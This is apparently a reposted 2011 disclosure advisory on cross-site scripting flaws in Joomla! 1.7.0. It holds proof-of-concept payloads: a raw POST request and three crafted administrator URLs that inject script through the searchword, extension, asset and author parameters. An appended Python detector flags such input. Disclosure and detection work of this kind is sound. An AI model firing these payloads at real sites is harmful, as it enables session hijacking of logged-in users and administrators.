Source: 自学PHP网 | Date: 2015-04-17 14:47
Joomla! 1.7.0 | Multiple Cross Site Scripting (XSS) Vulnerabilities
1. Overview
Joomla! 1.7.0 (stable version) contains multiple XSS vulnerabilities.
2. Background
Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets. It comprises a model-view-controller (MVC) web application framework that can also be used independently. Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization.
3. Vulnerability Description
Several parameters (searchword, extension, asset, author) in Joomla! core components are not properly sanitized upon submission to the /index.php URL, which allows an attacker to conduct cross-site scripting attacks. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser.
4. Affected versions: <= 1.7.0
5. PROOF-OF-CONCEPT/EXPLOIT
component: com_search, parameter: searchword (Browser: IE, Konqueror)
=====================================================================
[REQUEST]
POST /joomla17_noseo/index.php HTTP/1.1
Host: www.2cto.com
Accept: */*
Accept-Language: en
User-Agent: MSIE 8.0
Connection: close
Referer: http://www.2cto.com/joomla17_noseo
Content-Type: application/x-www-form-urlencoded
Content-Length: 456

task=search&Itemid=435&searchword=Search';onunload=function(){x=confirm(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,97,32,109,101,115,115,97,103,101,32,102,114,111,109,32,65,100,109,105,110,105,115,116,114,97,116,111,114,33,10,68,111,32,121,111,117,32,119,97,110,116,32,116,111,32,103,111,32,116,111,32,73,110,98,111,120,63));alert(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,88,83,83,33));};//xsssssssssss&option=com_search
[/REQUEST]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
User Login is required to execute the following XSSes.
Parameter: extension, Component: com_categories
====================================================
http://www.2cto.com/joomla17_noseo/administrator/index.php?option=com_categories&extension=com_content%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22

Parameter: asset, Component: com_media
====================================================
http://www.2cto.com/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22&author=

Parameter: author, Component: com_media
====================================================
http://www.2cto.com/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=&author=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
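A defender-side check for the request shapes listed in this section, as an added example that is not part of the original advisory or of Joomla's code: it flags requests in which the four named parameters carry attribute-breakout input. The function name, the assumed legitimate value shapes for extension, asset and author, and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Component -> parameters named in the advisory.
WATCHED = {
    "com_search": ["searchword"],
    "com_categories": ["extension"],
    "com_media": ["asset", "author"],
}
# Assumed legitimate value shapes (an assumption, not taken from Joomla's source).
STRICT = {
    "extension": re.compile(r"com_[a-z0-9_.]+"),
    "asset": re.compile(r"\d*"),
    "author": re.compile(r"\d*"),
}
# Free-text fields: flag characters that can leave an HTML attribute or
# JS string, and inline event-handler assignments.
BREAKOUT = re.compile(r"""["<>]|'\s*;|\bon[a-z]+\s*=""", re.I)

def check_request(url, body=""):
    """Return sorted (component, parameter) pairs whose value looks like markup injection."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for key, values in parse_qs(body, keep_blank_values=True).items():
        params.setdefault(key, []).extend(values)
    hits = set()
    for component in params.get("option", []):
        for name in WATCHED.get(component, []):
            for value in params.get(name, []):
                strict = STRICT.get(name)
                bad = not strict.fullmatch(value) if strict else bool(BREAKOUT.search(value))
                if bad:
                    hits.add((component, name))
    return sorted(hits)

# Constructed sample requests (not captured traffic): (url, form body).
SAMPLES = [
    ("/administrator/index.php?option=com_categories&extension=com_content", ""),
    ("/administrator/index.php?option=com_categories"
     "&extension=com_content%22%20onmouseover%3D%22x", ""),
    ("/administrator/index.php?option=com_media&view=images&asset=12&author=", ""),
    ("/administrator/index.php?option=com_media&view=images&asset=&author=1%22%20x%3D%22", ""),
    ("/index.php", "task=search&searchword=rock+'n'+roll&option=com_search"),
    ("/index.php", "task=search&searchword=a'%3Bonunload%3Dx&option=com_search"),
]

if __name__ == "__main__":
    for url, body in SAMPLES:
        print(check_request(url, body) or "clean", url, body)
```

The searchword case arrives in a POST body, so it is only visible where request bodies are inspected (a WAF or reverse proxy), not in a standard access log.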
6. IMPACT
Attackers can compromise the session of a currently logged-in user or administrator and impersonate arbitrary user actions available under /administrator/ functions.
7. Solution
Upgrade to a later version.
8. VENDOR
Joomla! Developer Team http://www.joomla.org
#yehg [2011-09-29]